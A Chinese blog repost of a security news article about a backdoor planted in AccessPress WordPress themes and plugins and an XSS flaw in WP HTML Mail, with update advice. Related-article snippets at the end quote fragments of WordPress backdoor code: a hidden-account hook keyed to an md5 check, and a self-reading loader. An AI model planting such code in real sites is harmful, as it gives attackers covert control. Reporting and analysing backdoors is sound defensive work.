黑客在数十个 WordPress 插件和主题中插入秘密后门,可发动供应链攻击

最新推荐文章于 2024-03-05 10:37:02 发布
最新推荐文章于 2024-03-05 10:37:02 发布
阅读量727 收藏
点赞数
文章标签: java 安全 linux 大数据 wordpress
原文链接:https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247510263&idx=1&sn=de29839373754b8dbcb3ea4b4bc99067&chksm=ea94999ddde3108b0692e93d7baf65159c5fbebd6a40fe02d124421d7a662caced29c664ccdd&scene=126&&sessionid=0
版权

18ef8e54332b65ad99da6dbf35524c83.gif 聚焦源代码安全,网罗国内外最新资讯!

编译:代码卫士

6dde2ff7e10da0c552c526ec5d8d4d1c.png

专栏·供应链安全

数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成为当今社会的根本性、基础性问题。

随着软件产业的快速发展,软件供应链也越发复杂多元,复杂的软件供应链会引入一系列的安全问题,导致信息系统的整体安全防护难度越来越大。近年来,针对软件供应链的安全攻击事件一直呈快速增长态势,造成的危害也越来越严重。

为此,我们推出“供应链安全”栏目。本栏目汇聚供应链安全资讯,分析供应链安全风险,提供缓解建议,为供应链安全保驾护航。

注:以往发布的部分供应链安全相关内容,请见文末“推荐阅读”部分。

51f3b80a9c2de21dd60cde71b0edfcc6.png

2021年9月的前半个月,黑客在数十个托管在开发者网站上的WordPress 主题和插件中插入秘密后门,以感染更多网站,发动供应链攻击。

该后门可导致攻击者完全控制使用了 AccessPress Themes 公司旗下40个主题和53个插件的网站。AccessPress Themes 是一家尼泊尔公司,声称活跃网站安装数量至少为36万次。

WordPress 插件套件开发公司 JetPack 的研究人员指出,“受感染的扩展中包含一个 web shell 的释放器,可导致攻击者完全访问受感染站点。如果这些扩展是从 WordPress[.]org 目录中直接下载或安装的,则没有问题。”

该漏洞的编号为 CVE-2021-24867。Sucuri公司分析指出,某些受感染网站早在三年前就被利用,说明攻击者将这些网站的访问权限出售给垃圾邮件活动攻击者。

本月初,网络安全公司 eSentire 分析称,受陷 WordPress 网站成为恶意软件交付的温床,使对此毫不知情的用户通过名为”GootLoader” 的植入在搜索引擎如Google 搜索婚后协议或知识财产协议。

4275d9cc7bd3e1e6c5447cb493a4962e.png

建议直接从 AccessPress Themes 网站安装这些插件的网站所有人立即更新至安全版本,或使用 WordPress[.]org 的最新版本取代旧版本。另外,需要部署 WordPress 清洁版本恢复后门安装过程中所作的修改。

XSS 漏洞(CVE-2022-0218)

前不久,WordPress 所属公司 Wordfence 披露了已修复的XSS漏洞详情。该漏洞影响插件 “WordPress 邮件模板设计器 – WP HTML Mail”,它已在2万多个网站上安装。

该漏洞的编号为CVE-2022-0218,CVSS v3.1 评分为8.3。研究人员指出,“该权限可使未认证攻击者注入恶意 JavaScript,当网站管理员访问模板编辑器时即执行。该漏洞也可使攻击者修改邮件模板以包含任意数据,可被用于执行钓鱼攻击。“

Risk Based Security 公司本月发布数据显示,截至2021年年底,收到2240个第三方 WordPress 插件漏洞,比2021年增长了142%。截至目前,共发现了10359个 WordPress 插件漏洞。

开源卫士试用地址:https://oss.qianxin.com

362a2de5ed1fb63f20a8a1df697696d2.png

推荐阅读

在线阅读版:《2021中国软件供应链安全分析报告》全文

2021年软件供应链攻击数量激增300%+

热门开源CMS平台 Umbraco 中存在多个安全漏洞,可使账户遭接管

详细分析开源软件项目 Ajax.NET Professional 中的RCE 漏洞(CVE-2021-23758)

SAP 严重漏洞可导致供应链攻击

Apache PLC4X开发者向企业下最后通牒:如不提供资助将停止支持

Apache 软件基金会:顶级项目仍使用老旧软件,补丁作用被削弱

美国商务部发布软件物料清单 (SBOM) 的最小元素(上)

美国商务部发布软件物料清单 (SBOM) 的最小元素(中)

美国商务部发布软件物料清单 (SBOM) 的最小元素(下)

NIST 发布关于使用“行政令-关键软件”的安全措施指南

NIST 按行政令关于加强软件供应链安全的要求,给出“关键软件”的定义及所含11类软件

SolarWinds 攻击者再次发动供应链攻击

美国“加强软件供应链安全实践的指南” (SSDF V1.1草案) 解读来了

软件供应链安全现状分析与对策建议

“木马源”攻击影响多数编程语言的编译器,将在软件供应链攻击中发挥巨大作用

GitHub 在 “tar” 和 npm CLI 中发现7个高危的代码执行漏洞

流行的 NPM 包依赖关系中存在远程代码执行缺陷

速修复!热门npm 库 netmask 被曝严重的软件供应链漏洞,已存在9年

Npm 恶意包试图窃取 Discord 敏感信息和浏览器文件

微软“照片”应用Raw 格式图像编码器漏洞 (CVE-2021-24091)的技术分析

SolarWinds 供应链事件后,美国考虑实施软件安全评级和标准机制

找到软件供应链的薄弱链条

GitHub谈软件供应链安全及其重要性

揭秘新的供应链攻击:一研究员靠它成功入侵微软、苹果等 35 家科技公司

开源软件漏洞安全风险分析

开源OS FreeBSD 中 ftpd chroot 本地提权漏洞 (CVE-2020-7468) 的技术分析

集结30+漏洞 exploit,Gitpaste-12 蠕虫影响 Linux 和开源组件等

限时赠书|《软件供应链安全—源代码缺陷实例剖析》新书上市

热门开源CI/CD解决方案 GoCD 中曝极严重漏洞,可被用于接管服务器并执行任意代码

GitKraken漏洞可用于盗取源代码,四大代码托管平台撤销SSH密钥

因服务器配置不当,热门直播平台 Twitch 的125GB 数据和源代码被泄露

彪马PUMA源代码被盗,称客户数据不受影响

原文链接

https://thehackernews.com/2022/01/hackers-planted-secret-backdoor-in.html

题图:Pixabay License

本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。

7cd24f4b466e5000da1ad49c9bf6a32d.png

fc78de26cb2d44af79feaa317f271308.png

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的产品线。

   7e510397c5c361d0c0a5ed6f15490b35.gif 觉得不错,就点个 “在看” 或 "赞” 吧~

奇安信代码卫士
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WordPress建站的10个重要的安全插件和技巧(图)
01-20
这篇文章重点介绍10个重要的WordPress安全插件和技巧,用来保护WordPress网站或者博客。1. WP Security人工帮助你修复被黑客入侵的网站,只要按照他们网站上的联系电话拨打即可,不收费。2. Admin SSLAdmin SSL通过...
资源宝分享wordpress主题后门检测清理技巧
云博客_资源宝分享
04-29 2070
资源宝分享wordpress主题后门检测清理技巧 更多文章查看资源宝博客:www.httple.net 但是对于wordpress漏洞并不是所有人都很了解,往往在网站运营过程没能注意网站的安全。 网站的安全除了空间服务商本身的安全控制外,那就是网站程序本身的安全问题。那我们该如何保障网站自身的安全呢?下面就以我的资源宝博客为例,来说说wordpress网站的安全问题。话说wordpress类网站的安全主要从两方面来讲: 一、wordpress程序本身安全 wordpress本身就存在一些漏洞,所以
wordpress免费模板会不会留后门
xiaoyuya
09-29 205
后门是违法行为,wordpress主题制作者打死也不敢自己给自己做的wordpress主题留个后门,除非他想吃牢饭。 有些人的网站被黑了,首先会怀疑是不是自己下载的免费主题有问题,这么怀疑也正常。 但是,你得先问问自己的主题是在哪里下载的,是不是来源可靠。 本站louyuwu.net提供的的均为精智wordpress主题http://www.jianzhanpress.com提供的免费主题,经过验证,来源可靠的才敢放上来了。 如果你是到一些,不知道来源的下载站,随便就下载了个wordpress..
vulfocus复现:spring 命令执行 (CVE-2022-22947)
woai_zhongguo的博客
07-18 3867
vulfocus复现:spring 命令执行 (CVE-2022-22947)
7-PHP代码审计——wordpress插件漏洞分析
网络安全
04-27 1372
1. wordpress插件漏洞 wordpress本身的安全性是比较完善的,通常安全审计大部分的漏洞都是来自wordpress的安装的第三方插件wordpress并不保证这些插件安全性,因为第三方插件都是由其他的开发者编写的,插件安全性取决于开发者的水平和安全意识,毕竟每个开发者的安全意识是不一样的。 因此在进行wordpress漏洞挖掘的时候,从插件入手分析是一个不错的选择。 在分析wordpress插件漏洞的环境以及用到的插件: Ultimate Produce Catalog.
wordpress 黑客_如何在被黑客入侵的WordPress网站找到后门并进行修复
cumohuo9136的博客
09-07 1674
wordpress 黑客Time and time again, we have helped users fix their hacked WordPress sites. Most of the time when they reach out to us, they have already cleaned up the site, and the hacker was able to ge...
spaceapi-wp-widget:一个小的 Wordpress 插件,在小部件显示黑客空间的打开状态
06-16
SpaceAPI Wordpress 小工具这是一个小型 Wordpress 插件,可在小部件显示打开状态。 您只需要指定一个端点 URL。执照版权所有 2015 Coredump 黑客空间。 根据 GPL 版本 2 或更高版本获得许可。
通信与网络的浅谈社交媒介防范遭受黑客攻击
10-22
 由于程序员设计一些功能复杂的程序时,一般采用模块化的程序设计思想,将整个项目分割为多个功能模块,分别进行设计、调试,这时的后门就是一个模块的秘密入口。在程序开发阶段,后门便于测试、更改和增强模块功能...
通信与网络的电信IP网防范“黑客攻击”的策略分析
11-18
1 引言  电信网从原来电话交换为主的话音业务正全面向语音、数据、多媒体等综合业务的平台转变。IP技术成为下一代电信网络的关键技术,传统... 近年来,黑客对电信网络的攻击给社会带来了极大的损害,随着黑客攻击
通信与网络的WEB安全黑客十大攻击方式及防御方法
10-23
当前,有安全专家总结了在Web安全领域,黑客发动攻击的十大原因。希望能给有需要的用户带来帮助,根据不同情况解决遇到的问题,给用户带来安全的Web体验。  十大Web攻击原因  第一,桌面漏洞  Internet ...
【译】WordPress Bricks主题安全漏洞曝光,25,000个安装受影响
最新发布
IT技术分享社区
03-05 655
(概念验证)利用程序,但Snicco和Patchstack都发布了技术细节,指出存在于prepare_query_vars_from_settings()函数的潜在易受攻击的代码。该漏洞已在2024年2月13日发布的1.9.6.1版本得到解决,这仅仅是在WordPress安全提供商Snicco在2月10日报告了该漏洞几天后。WordPress的Bricks主题存在一个严重的安全漏洞,恶意威胁行为者正在积极利用该漏洞在易受攻击的安装上运行任意PHP代码。建议插件的用户应用最新补丁以减轻潜在威胁。
黑客利用WordPress 插件建立后门网站
w3cschools的博客
04-25 749
Eval PHP 插件的工作方式足以将页面保存为草稿,以便在 [evalphp] 短代码执行 PHP 代码,” 东方联盟安全研究人员解释说,并补充说这些恶意页面是由真正的网站管理员创建的,这表明攻击者能够以特权用户身份成功登录。Sucuri 表示,在过去 6 个月,它在受感染网站上检测到超过 6,000 个后门实例,将恶意软件直接插入数据库的模式描述为“新的有趣的发展”。攻击链需要在受感染的网站上安装 Eval PHP 插件,并滥用它在多个帖子建立持久性后门,这些帖子有时也保存为草稿。
小心WordPress盗版主题里暗藏后门
ChanYao的专栏
02-24 812
下面给大家看看这个常见的后门代码 add_action( ‘wp_head’, ‘wp_backdoor’ ); function wp_backdoor() { if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) { require( ‘wp-includes/registration.php’ ); if ( !username_exists( ‘backdoor’ ) ) { $user_id = wp_crea
【漏洞复现-django-SQL注入】vulfocus/django-cve_2022_28346
10-12 1719
【django-SQL注入】可控参数注入
WordPress主题后门严重威胁网站安全
jinyeweiyang的专栏
12-13 895
WordPress是国内站长非常喜欢采用的一款建站应用软件,由于其具有非常丰富的模版和插件,具有良好的可扩展性。特别对于博客类网站,WordPress几乎成为建站首选。 在阿里云安全团队的日常运营,我们发现,WordPress一直是黑客攻击的主要目标。下图是阿里云云盾安全运营团队对第三方应用遭受攻击的统计(Source:第27期阿里云云盾安全运营报告,http://security.ali
气死了,好好的wordpress主题,被人植入了后门程序
06-22 696
最近一直在研究wordrpess主题,但不知道为什么,新建的网站浏览量很好,但是搜索内容几乎为零,我看了下大体的浏览方向,发现IP地址都在河南地区,我就奇怪了,什么人比我还用心,天天打开我网站看啊。 今天在检查代码的时候发现我的wordpss主题被人插入了如下的代码: <?php function _verifyactivate_widgets(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FI
网传分享的Wordpressripro主题4.8版本后门分析_盾给网下载修复文件[建站教程]
sinzen的博客
12-18 2193
关于最近网传的日主题ripro4.8版本破解版的后门问题,源码分享源头不清楚,盾给网也是转载免费分享,没想到了套路。所有在网络上(无论是盾给源码下载网或是其他网站)下载到ripro4.8源码的朋友请好好阅读此文章: 下载后用D盾扫描 发现有加密文件,用Notepad++查看 破解混淆加密后得到源文件 经查看发现后门代码 01 02 03 04 05 ...
猥琐的wordpress后门分享
weixin_33781606的博客
12-17 291
  https://www.t00ls.net/thread-37312-1-1.html 一个可以自动调用管理员帐号登录wordpress后台的方法。 <?php require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。 $query_str = "SELECT ID F...
Sigstore:软件签名保障供应链安全的创新解决方案
随着像XCodeGhost和SolarWinds等攻击事件的发生,黑客瞄准了软件供应链的漏洞,对企业和政府机构构成严重威胁。传统的软件签名机制在开源和企业生态系统并未得到充分利用,因此迫切需要一种更有效的方法来增强...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值